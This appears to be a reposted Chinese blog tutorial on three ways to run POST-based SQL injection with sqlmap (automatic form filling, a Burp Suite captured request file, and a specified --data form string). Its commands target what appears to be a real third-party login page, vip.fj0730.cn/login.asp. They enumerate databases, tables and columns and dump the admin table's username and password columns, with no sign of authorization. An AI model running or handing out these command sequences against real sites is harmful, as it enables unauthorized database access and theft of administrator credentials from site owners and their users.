zoukankan      html  css  js  c++  java
  • Sqlmap POST注入 三种方法(转载)

    不管怎么说?使用工具Sqlmap POST注入都会简单很多,具体说说Sqlmap POST注入 三种方法吧!

    一、自动填写表单

    自动填写表单是Sqlmap工具POST注入的第一种方法,具体步骤如下:

    1、判断是否有post注入?

    root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms

    出来的提示,一路回车就可以了!

    结果如下图:

    Sqlmap POST注入

    从这里,可以得到数据库是:Microsoft SQL Server,也就是mssql;

    总之,一句话总结即可!IIS+ASP+windows+mssql;

    这里重点说一下,Sql Server(mssql)数据库类似于mysql,数据库结构如下:

    • 数据库A -> 表名 -> 列名 -> 数据
    • 数据库B -> 表名 -> 列名 -> 数据

    因此:mssql注入和mysql注入其实都差不多。

    2、查找数据库

    root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms --dbs

    Sqlmap POST注入

    注意:如果遇到数据库非常多,而且我们也不知道管理用户名和密码存放在哪个数据库中?又应该怎么办呢?

    查找当前的数据库

    root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms --current-db

    后面就不截图了,都很简单,这里找到了当前数据库是“vip_0730"。

    3、查找表名

    root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 --tables

    4、查找列名

    root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 -T admin --columns

    5、爆出数据

    root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 -T admin -C user_name,user_pwd --dump

    从这里就可以爆出 vip_0730 数据库 中 admin 表的 user_name 和 user_pwd 列的数据了。

    二、Sqlmap结合BurpSuite

    这是Sqlmap工具POST注入的第二种方法;这种方法要比自动填写表单准确性高些,但是:自动表单会简单快一点。具体步骤如下:

    1、抓包

    2、全选抓包的数据,右键 -> Copy 就可以保存到 1.txt 文档中;

    BurpSuite抓包

    3、sqlmap -r 指定文件

    root@Kali:~# sqlmap -r '/home/1.txt'

    4、查找当前数据库

    root@Kali:~# sqlmap -r '/home/1.txt' --current-db

    后面的这些和前面的就没什么区别了,就不继续讲重复的内容了。下面直接来说说Sqlmap POST注入第三种方法吧!

    三、指定表单注入

    指定表单注入是Sqlmap POST注入第三种方法,这个其实也需要抓包的。当然,不抓也可以,查看源代码等什么的也不是不可以,只是抓包比较精准而已。只要能知道指定的表单数据就可以了!

    例如:我这里用指定表单注入,你只要能获取到“userid=aaa&passwd=bbbb”这个就可以了,不管你是用哪种途径获取到的都可以。

    sqlmap post注入 指定表单注入

    1、检测是否有注入?

    root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --data "userid=aaa&passwd=bbbb"

    2、查找当前数据库

    root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --data "userid=aaa&passwd=bbbb" --current-db

     ——————————————————————————————————————————————

    转载地址https://www.fujieace.com/penetration-test/sqlmap-post.html

  • 相关阅读:
    SAP基础:定位点运算
    WDA基础十七:ALV不同行显示不同下拉
    WDA基础十六:ALV的颜色
    WEB UI基础八:链接跳转到标准的工单界面
    WDA基础十五:POPUP WINDOW
    CRM创建BP(END USER)
    CRM 员工创建并分配用户
    STRANS一:简单的XML转换
    WEB UI 上传URL附件(使用方法备份)
    FPM四:用OVP做查询跳转到明细
  • 原文地址:https://www.cnblogs.com/changpuyi/p/12952779.html
Copyright © 2011-2022 走看看